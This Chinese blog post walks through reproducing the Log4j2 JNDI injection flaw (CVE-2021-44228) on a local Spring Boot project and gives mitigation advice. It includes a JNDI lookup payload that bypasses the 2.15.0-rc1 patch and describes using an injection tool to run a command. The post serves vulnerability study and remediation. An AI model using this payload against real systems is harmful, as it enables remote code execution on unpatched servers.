漏洞复现 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)

该漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。

 

漏洞原理

利用jndi的Lookup功能,实现jndi注入命令执行

影响范围

log4j 2.0-beta9到2.15.0(1.* 版本不受影响)

复现环境

jdk 1.8.0_181

log4j2.14.1

OS:Win10

复现步骤

1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。

能解析${}表达式的才存在漏洞,官网的log4j库已经修复了,无法解析该表达式,需要找老的库来复现。

 2. 验证外部传入表达式${}能否解析

3.开启JNDI注入利用工具

设置执行打开计算器的命令,开启后得到rmi和ldap的地址

4.利用jndi注入

官方随后出的补丁版本2.15.0-rc1也是可以绕过继续注入的,绕过方法为带空格的异形URI地址(127.0.0.1:8888/和exp之间):${jndi:ldap://127.0.0.1:8888/ exp}

嗯,补得很好,下次不要再补了

漏洞修复

1. 下载官网最新版的log4j(2.16.0)版本就行了

2. 建议JDK使用6u211、7u201、8u191、11.0.1及以上的版本(网上看到的,本人未验证过)

正好机器上有jdk13,咱是勤劳而严谨的人儿,还是要验证一把

重新建一个jdk13的springboot工程,依然还是同一个log4j库,执行结果如下:

 ${}表达式依然是可以执行的,只是jndi注入无法执行了。嗯,升级jdk是可行的。

 

本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。

如需转载,请注明出处,这是对他人劳动成果的尊重。

 

posted @ 2022-05-07 11:18  Sally_Zhang  阅读(162)  评论(0编辑  收藏  举报